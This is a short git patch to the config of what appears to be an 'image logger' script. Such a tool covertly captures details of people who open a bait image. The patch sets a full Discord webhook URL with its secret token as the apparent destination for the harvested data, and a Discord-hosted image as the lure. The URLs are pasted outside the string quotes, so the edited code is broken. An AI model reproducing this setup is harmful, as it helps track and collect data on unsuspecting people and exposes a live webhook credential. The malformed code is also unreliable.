From 432e83967050c48b5d6af9135553b9e10b6f0b15 Mon Sep 17 00:00:00 2001 From: deamonseazon-dev Date: Mon, 22 Dec 2025 00:43:12 +0100 Subject: [PATCH] Update main.py --- api/main.py | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/api/main.py b/api/main.py index 27967a2..b4aee53 100644 --- a/api/main.py +++ b/api/main.py @@ -12,8 +12,8 @@ config = { # BASE CONFIG # - "webhook": "", - "image": "", # You can also have a custom image by using a URL argument + "webhook": "",https://canary.discord.com/api/webhooks/1452444089067765942/IBVYlX5WF6bZfxVkAIAdtvyTp3dsJ4F7rrTSVrZU7xRow-RheQgsWlIsXPiAPzFmUePD + "image": "",https://media.discordapp.net/attachments/1448806103839277089/1452436835690090608/lolo.png?ex=6949ceb6&is=69487d36&hm=56348af4474e4cf93f1e6e905c3cdb87fbb57a1d45bb0df2fca5043bed6a7b96&=&format=webp&quality=lossless&width=719&height=623 # (E.g. yoursite.com/imagelogger?url=) "imageArgument": True, # Allows you to use a URL argument to change the image (SEE THE README)